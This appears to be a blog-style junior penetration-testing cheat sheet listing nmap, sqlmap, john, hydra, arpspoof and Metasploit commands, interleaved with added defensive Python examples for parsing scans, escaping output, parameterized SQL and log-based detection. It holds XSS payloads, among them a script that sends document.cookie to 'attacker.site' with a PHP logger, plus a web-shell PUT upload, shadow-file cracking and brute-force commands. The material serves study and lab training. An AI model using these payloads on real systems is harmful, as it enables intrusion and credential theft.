Introduction
There are lots of resources out there that can help you start in penetration testing. One of them is the WYWM Potential platform, alongside the various junior penetration testing certifications. I recently certified as a junior penetration tester, and I realized that at the junior level there are not that many commands and tools you need to know. In fact, I was able to summarize all of them in the form of a cheat sheet. These are the commands I use every day, and having this cheat sheet saves a lot of time. If you know all the commands and tools below, you will be well prepared for your first junior penetration testing certification.
*Disclaimer
Penetration testing is a lot more than just throwing commands against a machine.
I would highly suggest taking an ethical hacking course before attempting to use these commands and tools in real-life engagements. Neither I nor the company is responsible for the misuse of these commands and tools; they are presented solely for educational purposes.
Also, before attempting any certification, you should practise all of these commands in some sort of lab environment and understand how these tools and commands work together.
Let's begin!
Enumeration
Anyone who has done any type of penetration testing knows that enumeration is half the battle. Here are some of the techniques you should know.
Nmap Scans
nmap Scan (Full)
nmap -sC -sV -p- 10.10.10.10
nmap Scan (UDP Partial)
nmap -sU -sV 10.10.10.10
nmap Scan (Partial)
nmap -sC -sV 10.10.10.10
OS Detection
nmap -O 10.10.10.10
whois
whois site.com
Host Discovery
fping -a -g 10.10.10.0/24 2>/dev/null
#ping sweep only, skips the port scan phase
nmap -sn 10.10.10.0/24
netdiscover -r 10.10.10.0/24
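Added example (not part of the original cheat sheet): once the scans above are saved with `-oG`, you want the live hosts and open ports out of the file rather than reading it by eye. The script below parses nmap's grepable format; the scan output it contains is a constructed sample, not a real scan result, and the host addresses are the placeholder ones used throughout this sheet.

```python
import re

# Constructed sample of grepable output, as written by
# `nmap -sV -p- -oG scan.gnmap 10.10.10.0/24` (not a real scan result)
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Mon Jan 15 10:00:00 2024 as: nmap -sV -p- -oG scan.gnmap 10.10.10.0/24
Host: 10.10.10.10 ()\tStatus: Up
Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, 443/closed/tcp//https///\tIgnored State: filtered (65532)
Host: 10.10.10.11 ()\tStatus: Up
Host: 10.10.10.11 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, 3306/filtered/tcp//mysql///\tIgnored State: closed (65533)
# Nmap done at Mon Jan 15 10:05:00 2024 -- 256 IP addresses (2 hosts up) scanned in 300.00 seconds
"""

# "Host: <ip> (<hostname>)<TAB><Status: ...|Ports: ...>"
HOST_RE = re.compile(r"^Host: (?P<ip>\S+) \([^)]*\)\t(?P<rest>.*)$")
# Each port entry is port/state/protocol/owner/service/rpc_info/version/
PORT_RE = re.compile(
    r"(?P<port>\d+)/(?P<state>\w+)/(?P<proto>\w+)/(?P<owner>[^/]*)/"
    r"(?P<service>[^/]*)/(?P<rpc>[^/]*)/(?P<version>[^/]*)/"
)


def live_hosts(gnmap_text):
    """Hosts reported 'Status: Up' (this is all a `nmap -sn` file contains)."""
    hosts = []
    for line in gnmap_text.splitlines():
        m = HOST_RE.match(line)
        if m and m["rest"].startswith("Status: Up") and m["ip"] not in hosts:
            hosts.append(m["ip"])
    return hosts


def open_ports(gnmap_text):
    """Map each host to its open ports; closed/filtered entries are dropped."""
    result = {}
    for line in gnmap_text.splitlines():
        m = HOST_RE.match(line)
        if not m or not m["rest"].startswith("Ports:"):
            continue
        ports_field = m["rest"].split("\t")[0][len("Ports: "):]
        for p in PORT_RE.finditer(ports_field):
            if p["state"] != "open":
                continue
            result.setdefault(m["ip"], []).append({
                "port": int(p["port"]), "proto": p["proto"],
                "service": p["service"], "version": p["version"],
            })
    return result


def summary(gnmap_text):
    """One 'ip:port/proto service version' line per open port."""
    return [f"{ip}:{p['port']}/{p['proto']} {p['service']} {p['version']}".rstrip()
            for ip, ports in open_ports(gnmap_text).items() for p in ports]


if __name__ == "__main__":
    print("live:", live_hosts(SAMPLE_GNMAP))
    for line in summary(SAMPLE_GNMAP):
        print(line)
```

Run it against your own file with `open_ports(open("scan.gnmap").read())`. Nmap replaces slashes inside version strings with `|` in grepable output, so the slash-delimited regex is safe; the same parser works for the `-sn` sweep, which only produces `Status:` lines.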
Web Applications
The next set of commands should be used when attacking a web application. Actually understanding what these do, and not just throwing them against your target, is really important.
Banner Grabbing
nc -v 10.10.10.10 <port>
HEAD / HTTP/1.0
(press Enter twice: the blank line ends the request and the server answers with its headers)
OpenSSL for HTTPS services
openssl s_client -connect 10.10.10.10:443
HEAD / HTTP/1.0
(press Enter twice, as above)
Cross Site Scripting (XSS)
<script>alert('xss');</script>
<script>alert(document.cookie)</script>
<img src="javascript:alert(1)">
http://victim.site/search.php?find=<payload>
To send the cookie to an attacker-controlled site:
<script>
var i = new Image();
i.src = "http://attacker.site/log.php?q=" + document.cookie;
</script>
log.php page on the attacker's site:
<?php
// appends each received value of q (the cookie) to a log file, one per line
$filename = "/tmp/log.txt";
$fp = fopen($filename, 'a');
$cookie = $_GET['q'];
fwrite($fp, $cookie . "\n");
fclose($fp);
?>
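Added example (not part of the original cheat sheet): the other side of the XSS payloads above, written in Python. It shows the bug in a `search.php`-style page that reflects the `find` parameter unescaped, the one-line fix (HTML-encode output), and a detector that runs over access-log lines and flags the payloads once URL-decoded. The log lines are constructed samples, not captured traffic. One caveat on the payload list: modern browsers no longer run `javascript:` URLs in an `<img src>`, so that third payload mostly survives as a log signature.

```python
import html
import re
from urllib.parse import unquote_plus


def render_search_vulnerable(find):
    # Reflects the query string straight into the page: the bug the payloads above exploit
    return "<p>Results for: " + find + "</p>"


def render_search_fixed(find):
    # HTML-encode before inserting user data into an HTML text context
    return "<p>Results for: " + html.escape(find, quote=True) + "</p>"


# Constructed combined-format access log lines (not captured traffic)
SAMPLE_ACCESS_LOG = [
    '10.10.14.5 - - [15/Jan/2024:10:00:01 +0000] "GET /search.php?find=laptop HTTP/1.1" 200 512',
    '10.10.14.9 - - [15/Jan/2024:10:00:02 +0000] "GET /search.php?find=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 640',
    '10.10.14.9 - - [15/Jan/2024:10:00:03 +0000] "GET /search.php?find=%3Cimg%20src%3D%22javascript%3Aalert%281%29%22%3E HTTP/1.1" 200 611',
    '10.10.14.5 - - [15/Jan/2024:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
# Coarse signature: an HTML tag that can carry script, or a javascript: URL
XSS_RE = re.compile(r"<\s*/?\s*(script|img|svg|iframe|object|embed)\b|javascript\s*:", re.IGNORECASE)


def find_xss_attempts(log_lines):
    """Return (source ip, timestamp, decoded path) for every request matching XSS_RE."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # decode twice so double-encoded payloads (%253C...) are caught too
        decoded = unquote_plus(unquote_plus(m["path"]))
        if XSS_RE.search(decoded):
            hits.append((m["ip"], m["ts"], decoded))
    return hits


if __name__ == "__main__":
    payload = "<script>alert('xss');</script>"
    print(render_search_vulnerable(payload))
    print(render_search_fixed(payload))
    for ip, ts, path in find_xss_attempts(SAMPLE_ACCESS_LOG):
        print(f"{ts} {ip} {path}")
```

Encoding the output neutralizes the reflected payload; the cookie-theft variant is additionally blunted by setting the session cookie with the `HttpOnly` flag, since `document.cookie` then cannot read it. The log signature is deliberately coarse and will miss obfuscated payloads; it is a starting point for triage, not a filter.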
HTTPRINT
httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt
HTTP Verbs
GET, POST, HEAD, PUT, DELETE, OPTIONS
Using the OPTIONS verb shows you which other verbs the server accepts:
nc 10.10.10.10 80
OPTIONS / HTTP/1.0
To upload a file over HTTP, use the PUT verb. First get the size of the payload in bytes (Content-length counts bytes, not characters):
wc -c shell.php
Then send the request, with a blank line between the headers and the file contents:
PUT /shell.php HTTP/1.0
Content-type: text/html
Content-length: <payload size in bytes>

<contents of shell.php>
Directory and File Scanning
dirb http://10.10.10.10
dirsearch.py -u http://10.10.10.10 -e '*'
#gobuster 3.x needs the dir subcommand; older versions take -u directly
gobuster dir -u http://10.10.10.10 -w /path/to/wordlist.txt
dirbuster
nikto -h 10.10.10.10
SQLMAP
sqlmap -u http://10.10.10.10 -p <parameter>
sqlmap -u http://10.10.10.10 --data "<POST string>" -p <parameter>
sqlmap -u http://10.10.10.10 --os-shell
sqlmap -u http://10.10.10.10 --dump
Order to use in:
#to identify database
sqlmap -u http://10.10.10.10 --dbs
#to identify tables
sqlmap -u http://10.10.10.10 -D <name of db> --tables
#to dump database
sqlmap -u http://10.10.10.10 -D <name of db> -T <name of table> --dump
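Added example (not part of the original cheat sheet): what sqlmap is actually finding when `-p <parameter>` comes back injectable, and the fix. The script builds a small in-memory SQLite database with constructed rows and shows a lookup that concatenates the parameter into the SQL next to the same lookup done with a bound parameter. Python's standard `sqlite3` module stands in for whatever database the target runs.

```python
import sqlite3


def make_db():
    """In-memory demo database; the rows are constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        [("alice", "hash-alice", "admin"), ("bob", "hash-bob", "user")],
    )
    return conn


def lookup_user_vulnerable(conn, username):
    # The parameter is pasted into the statement, so it can change the query's logic.
    # This is the pattern sqlmap's tests detect and then use for --dump.
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_user_fixed(conn, username):
    # Bound parameter: the driver sends the value as data, never as SQL text
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "x' OR '1'='1"
    print("vulnerable, normal input:", lookup_user_vulnerable(db, "bob"))
    print("vulnerable, tautology:   ", lookup_user_vulnerable(db, tautology))
    print("fixed, tautology:        ", lookup_user_fixed(db, tautology))
```

With the tautology the string-built query returns every row, which is the behaviour the `--dump` step above relies on; the parameterized version returns nothing because no user is literally named `x' OR '1'='1`. When you report an injectable parameter, the remediation to write up is the second function, not input filtering.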
System Attacks
This portion covers system attacks. It is very important to understand how to execute brute force attacks and how to run exploits.
Password Attacks
unshadow /etc/passwd /etc/shadow > password.txt
john password.txt
john --show password.txt
Hash Cracking
#--users takes a comma-separated list of logins or UIDs, not a file
john --wordlist=/path/to/wordlist --users=<user1,user2> hashfile
Brute Forcing with Hydra
hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22
hydra -L users.txt -P pass.txt telnet://10.10.10.10
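Added example (not part of the original cheat sheet): what the hydra SSH run above looks like from the target's side, and how it is detected. A run with `-t 10` produces a burst of `Failed password` lines in the server's auth log from one source across many usernames; the script below groups failures by source IP and flags any source that exceeds a threshold inside a sliding time window. The auth.log lines are constructed samples, not real logs.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed /var/log/auth.log lines: a fast hydra-style run from 10.10.14.9,
# plus one typo and one successful login from 10.10.14.5 (not real log data)
SAMPLE_AUTH_LOG = [
    "Jan 15 10:00:01 web01 sshd[2001]: Failed password for root from 10.10.14.9 port 41000 ssh2",
    "Jan 15 10:00:01 web01 sshd[2002]: Failed password for invalid user admin from 10.10.14.9 port 41001 ssh2",
    "Jan 15 10:00:02 web01 sshd[2003]: Failed password for root from 10.10.14.9 port 41002 ssh2",
    "Jan 15 10:00:02 web01 sshd[2004]: Failed password for invalid user user from 10.10.14.9 port 41003 ssh2",
    "Jan 15 10:00:03 web01 sshd[2005]: Failed password for root from 10.10.14.9 port 41004 ssh2",
    "Jan 15 10:00:03 web01 sshd[2006]: Failed password for invalid user test from 10.10.14.9 port 41005 ssh2",
    "Jan 15 10:00:09 web01 sshd[2007]: Failed password for alice from 10.10.14.5 port 52000 ssh2",
    "Jan 15 10:00:15 web01 sshd[2008]: Accepted password for alice from 10.10.14.5 port 52001 ssh2",
]

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def failed_logins(lines, year=2024):
    """Group failed SSH logins by source IP as (timestamp, username) pairs.
    syslog timestamps carry no year, so one is assumed (the current year in practice)."""
    events = defaultdict(list)
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events[m["ip"]].append((ts, m["user"]))
    return events


def brute_force_sources(lines, threshold=5, window_seconds=60):
    """Flag every source with at least `threshold` failures inside any
    `window_seconds` span; returns {ip: {failures, users}}."""
    alerts = {}
    for ip, evs in failed_logins(lines).items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it fits inside window_seconds
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {"failures": len(evs), "users": sorted({u for _, u in evs})}
                break
    return alerts


if __name__ == "__main__":
    for ip, info in brute_force_sources(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {info['failures']} failures, users tried: {', '.join(info['users'])}")
```

The single failure from `10.10.14.5` stays below the threshold, while the burst from `10.10.14.9` trips it within seconds; the spread of usernames per source is the second signal worth reporting, since a real user mistypes one password, not five accounts. The same approach is what fail2ban automates, and rate limiting or key-only authentication is the fix to recommend.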
ARP spoofing
#enable IP forwarding so intercepted traffic is still relayed to its real destination
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11
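Added example (not part of the original cheat sheet): the trace the arpspoof command above leaves on the victim, and a check that catches it. After spoofing, the victim's neighbour table maps the impersonated address (10.10.10.11 in the command above) to the attacker's MAC, which is also the MAC of the attacker's own IP. The script parses `ip neigh show` output and reports any MAC shared by several IPs and any gateway or peer whose MAC differs from a recorded baseline. The neighbour table and the baseline MAC are constructed samples.

```python
import re

# Constructed baseline recorded on a clean network: the real MAC of 10.10.10.11
BASELINE = {"10.10.10.11": "aa:bb:cc:00:00:11"}

# Constructed `ip neigh show` output from the victim after the arpspoof run above;
# 10.10.10.99 stands in for the attacker's own address (not real data)
SAMPLE_NEIGH = """\
10.10.10.11 dev tap0 lladdr de:ad:be:ef:00:99 REACHABLE
10.10.10.99 dev tap0 lladdr de:ad:be:ef:00:99 REACHABLE
10.10.10.20 dev tap0 lladdr aa:bb:cc:00:00:20 STALE
10.10.10.21 dev tap0 FAILED
"""

NEIGH_RE = re.compile(
    r"^(?P<ip>\S+) dev (?P<dev>\S+) lladdr (?P<mac>[0-9a-fA-F:]{17}) (?P<state>\S+)$"
)


def parse_neigh(text):
    """Map IP -> MAC from `ip neigh show` output; entries without a MAC are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line)
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table


def arp_anomalies(table, baseline):
    """Return findings as (kind, key, details) tuples."""
    findings = []
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    # one MAC answering for several IPs is the classic spoofing signature
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(("shared-mac", mac, sorted(ips)))
    # a known peer whose MAC changed since the baseline was taken
    for ip, known in baseline.items():
        seen = table.get(ip)
        if seen and seen != known.lower():
            findings.append(("baseline-mismatch", ip, [known.lower(), seen]))
    return findings


if __name__ == "__main__":
    for kind, key, details in arp_anomalies(parse_neigh(SAMPLE_NEIGH), BASELINE):
        print(kind, key, details)
```

A shared MAC is not proof on its own (a host with several addresses or a router doing proxy ARP looks the same), which is why the baseline comparison is the stronger signal; tools such as arpwatch keep that baseline continuously. Static ARP entries for the gateway, or dynamic ARP inspection on managed switches, are the mitigations to recommend.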
Metasploit
search <name of exploit>
use <name of exploit>
info
show options
show advanced
#check show options for the exact name; current modules use RHOSTS
set RHOST 10.10.10.10
set payload <name of payload>
exploit
background
sessions -l
sessions -i 1
ROUTING
I would practise routing if you are planning to take any junior penetration tester certification. Here is the command to remember:
ip route add <destination network or host> via <gateway IP>
Example:
ip route add 10.10.10.10 via 192.168.0.1
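Added example (not part of the original cheat sheet): a small model of what the kernel does with the route added above, so you can reason about it before typing it in a lab. The example above adds a host route (a /32) for 10.10.10.10 through 192.168.0.1; the functions below do longest-prefix lookup over a constructed routing table and check the rule that trips most people, which is that the `via` gateway must itself be on a directly connected network. The table, gateway addresses and interface layout are assumptions for the demo.

```python
import ipaddress

# Constructed routing table for a host on 192.168.0.0/24. The first entry is the
# page's example: `ip route add 10.10.10.10 via 192.168.0.1` (a /32 host route).
# `via` of None means on-link (directly connected, no gateway).
ROUTES = [
    ("10.10.10.10/32", "192.168.0.1"),
    ("192.168.0.0/24", None),
    ("0.0.0.0/0", "192.168.0.254"),     # default route
]


def lookup(dest, routes=ROUTES):
    """Longest-prefix match, the rule the kernel applies. Returns (prefix, via)."""
    addr = ipaddress.ip_address(dest)
    best = None
    for prefix, via in routes:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, via)
    if best is None:
        raise LookupError(f"no route to {dest}")
    return str(best[0]), best[1]


def can_add_route(via, routes=ROUTES):
    """`ip route add ... via GW` only succeeds if GW lies on a directly connected
    (on-link) network; otherwise the kernel rejects it (iproute2 reports
    'Nexthop has invalid gateway' or 'Network is unreachable' depending on version)."""
    gw = ipaddress.ip_address(via)
    return any(v is None and gw in ipaddress.ip_network(prefix) for prefix, v in routes)


def add_route(dest_prefix, via, routes):
    """Model of `ip route add <dest_prefix> via <via>` with the gateway check."""
    if not can_add_route(via, routes):
        raise ValueError(f"Nexthop has invalid gateway: {via}")
    routes.append((dest_prefix, via))


if __name__ == "__main__":
    for dest in ("10.10.10.10", "10.10.10.11", "192.168.0.50"):
        print(dest, "->", lookup(dest))
    table = list(ROUTES)
    add_route("10.10.10.0/24", "192.168.0.1", table)   # whole subnet through the pivot
    print("10.10.10.11 ->", lookup("10.10.10.11", table))
```

Note the difference between the page's example and the subnet route: the /32 only steers traffic for 10.10.10.10, while 10.10.10.11 still follows the default route until you add `10.10.10.0/24` through the same gateway. Checking `ip route get 10.10.10.11` after adding a route is the quickest way to confirm which entry the kernel actually picks.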